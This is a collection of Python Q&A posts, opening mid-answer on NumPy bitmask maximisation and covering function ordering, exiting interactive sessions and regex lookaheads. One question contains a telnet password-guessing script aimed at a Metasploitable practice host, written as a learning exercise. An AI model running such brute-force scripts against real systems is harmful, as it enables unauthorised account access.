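    a = a.reshape([1 << (3 - bit_index), 1 << bit_index])
    numpy.maximum(a[::2], a[1::2], out=a[1::2])
a = a.reshape([8])
print a  # [0 5 2 5 1 5 2 5] -- each cell is now the best over all subsets of i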
We then compute the products of lengths at complementary indices:
products = index_array * index_array[::-1] # We'd probably have to adjust this part
# if we picked dtype=int8 earlier.
find where the best product is:
best_product_index = products.argmax()
and the longest lists whose elements are subsets of the set represented by
`best_product_index` and its complement are the lists we want.
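To actually fetch those two lists (not just the product), one option is a final linear pass over the original collection: a list's elements are a subset of a mask exactly when its index has no bits outside the mask. A sketch, reusing the hypothetical `find_index` from above and assuming a qualifying list exists on each side:

mask = best_product_index
comp = (1 << 28) - 1 - mask  # the complementary set of numbers

list_a = max((l for l in lists if find_index(l) & ~mask == 0), key=len)
list_b = max((l for l in lists if find_index(l) & ~comp == 0), key=len)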
|
How to call a function that is defined later in a Python script?
Question: I am currently learning Python for some penetration testing and was practicing writing password-cracking scripts. While making a telnet password cracker I ran into a problem: the issue appeared when I tried to let the user write the findings, along with some extra information, to an output file.
I am using getopt to take arguments for the script such as the ip, username,
and an output file (I am trying to make an option to put in a word list for
the passwords and usernames but I am still learning about using files).
Because a function has to be written above where it is called, I am running into the issue of needing the function in two places: above the getopt for loop, and also inside the for loop that guesses the password. I have looked at a few possible solutions, but as I am still somewhat new to Python they confused me. Put simply, I need to be able to call the function before the point where it is written, if anyone understands that. Thank you for all the help in advance.
Also I know that there are most likely a lot more efficient ways to do what I
am trying, but I just wanted to mess around and see if I had the ability to do
this, no matter how unorganized the code is.
Here is my code:
import telnetlib
import re
import sys
import time
import getopt
from time import gmtime, strftime
total_time_start = time.clock()
#Get the arguments from the user
try:
opts, args = getopt.getopt(sys.argv[1:], "i:u:f:")
except getopt.GetoptError as err:
print str(err)
sys.exit(2)
passwords = ["hello","test", "msfadmin", "password"]
username = " "
ip = "0.0.0.0"
output_file = " "
for o, a in opts:
if o == "-i":
ip = a
elif o in ("-u"):
username =a
elif o in ("-f"):
output_file = a
file_out()
else:
assert False, "unhandled option"
#Connect using the password and username from the for loop later in the script.
def connect(username, password, ip):
global tn
tn = telnetlib.Telnet(ip)
print "[*] Trying " + username + " and " + password
tn.read_until("metasploitable login: ")
tn.write(username + "\n")
tn.read_until("Password: ")
tn.write(password + "\n")
#Guess the password
for password in passwords:
attempt = connect(username, password, ip)
time_start = time.clock()
if attempt == tn.read_until("msfadmin@metasploitable", timeout = 1):
pass
time_end = time.clock()
time_finish = time_end - time_start
#Determine if the password is correct or not
if time_finish > 0.001000:
print "\033[1;32;40m [*] Password '" + password + "' found for user '" + username+"'\033[0;37;40m\n"
total_time_end = time.clock()
total_time = (total_time_end - total_time_start)
#Print the findings to a file that is selected from an argument
def file_out():
date = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime())
fout = open(output_file, 'w')
fout.write("Server IP: " + ip)
fout.write("\nUsername is " + username)
fout.write("Password is " + password)
fout.write("\nCrack was conducted on " + date)
fout.write("The crack took a total time of " + total_time)
sys.exit(0)
Here is the error I am getting:
python telnet_cracker.py -i [ip of metasploitable] -u msfadmin -f test.txt
Traceback (most recent call last):
File "telnet_cracker.py", line 49, in <module>
file_out()
NameError: name 'file_out' is not defined
Answer: Move the function definition to the top level of the script, above the loop that calls it. There's no need to define a function inside a loop, and defining one inside a conditional isn't a good idea either.

> a function has to be written above where it is called

Not quite. Functions simply need to be _defined_ before the code that runs them executes; they don't need to be textually "above the code" where they are called. The same logic applies to variables.
If you need to reference certain variables for the function, then use
parameters.
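For example, this runs fine even though `file_out` appears below the code that calls it, because both `def` statements have executed before `main()` is actually called (a minimal, hypothetical sketch):

def main():
    file_out("test.txt", "0.0.0.0")  # fine: file_out exists by the time this runs

def file_out(output_file, ip):
    # take what you need as parameters instead of relying on globals
    with open(output_file, 'w') as fout:
        fout.write("Server IP: " + ip + "\n")

main()  # both definitions above have executed before this call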
|
Exiting interactive python3 session from script
Question: I'd like my program to automatically exit if it detects an error when loading
a file and parsing it (even when called from an interactive mode with -i).
I've tried variations of `exit()` and `sys.exit()`, but nothing seems to be
working. Instead of exiting the interactive session I get a stack trace. For
example, if I have the file `test.py` that is the following:
import sys
sys.exit(0)
when I run `python3 -i test.py` I get the following result:
Traceback (most recent call last):
File "test.py", line 2, in <module>
sys.exit()
SystemExit
>>>
and the session continues on, until I exit myself (using those exact lines
subsequently work, just not when they're called from the script). What am I
missing?
Answer: Try calling [os._exit()](https://docs.python.org/2/library/os.html#os._exit) to exit directly, without raising an exception. `sys.exit()` works by raising `SystemExit`, and under `-i` the interpreter prints the traceback and drops into the interactive prompt anyway, which is exactly the behavior you're seeing.
import os
os._exit(1)
Note that this bypasses all of Python's shutdown logic, including `atexit` handlers and the flushing of buffered output. Hope it helps.
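Since normal cleanup is skipped, flush anything you still want written before calling it, for example:

import os
import sys

sys.stdout.flush()  # os._exit() will not flush stdio buffers for you
os._exit(1)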
|
Or statements for complex regex formation in python
Question: I need to formulate a regex to pick up only the first part of a particular
string rather than the second part. For example:
(part1) (Part2)
SAI Table
Cloth
DARA
I want to extract only part1 (`SAI`, a blank, `DARA`), never part2. Notice that part1 is empty on the second line, so the regex should return a blank space there rather than `Cloth`. The same regex must work for all three lines. There is no fixed amount of space between the two parts; it varies.
This is the regex I tried, but it only works for string1 and string3:
[\s]{1,}((?:[a-zA-Z)(@\-,."'',&*]+[\s]?)+)[\s]{2,}
Is there any way to write a regex that would work in this case?
I can only use regex here, as I need it to return whatever string is present. The string can be alphanumeric and may contain the common symbols listed in my earlier regex. The spacing between the two parts is never fixed. I also need it to return a space where part1 is empty. Part2 itself can be ignored, but I have to make sure the regex never matches it.
Answer: If the first column (_part1_) is **always** followed by 2 spaces, whereas the
second (_part2_) is not, you can rely on that condition to prevent a match in
the last column. We can use the [lookahead](http://www.regular-
expressions.info/lookaround.html) `(?=[\t ]{2})` to assert for 2 consecutive
spaces or tabs.
**Code**
import re
patt = r'^[\t ]*(\S+(?:[\t ]\S+)*(?=[\t ]{2})| )'
str = r'''
(part1) (Part2)
SAI Table
Cloth
DARA
'''
print re.findall(patt, str, re.MULTILINE)
**Output**
['(part1)', 'SAI', ' ', 'DARA']
[ideone demo](http://ideone.com/lqvLXX)
You may as well change `\S` to `[a-zA-Z)(@\-,."'',&*]` to limit the allowed
characters.
|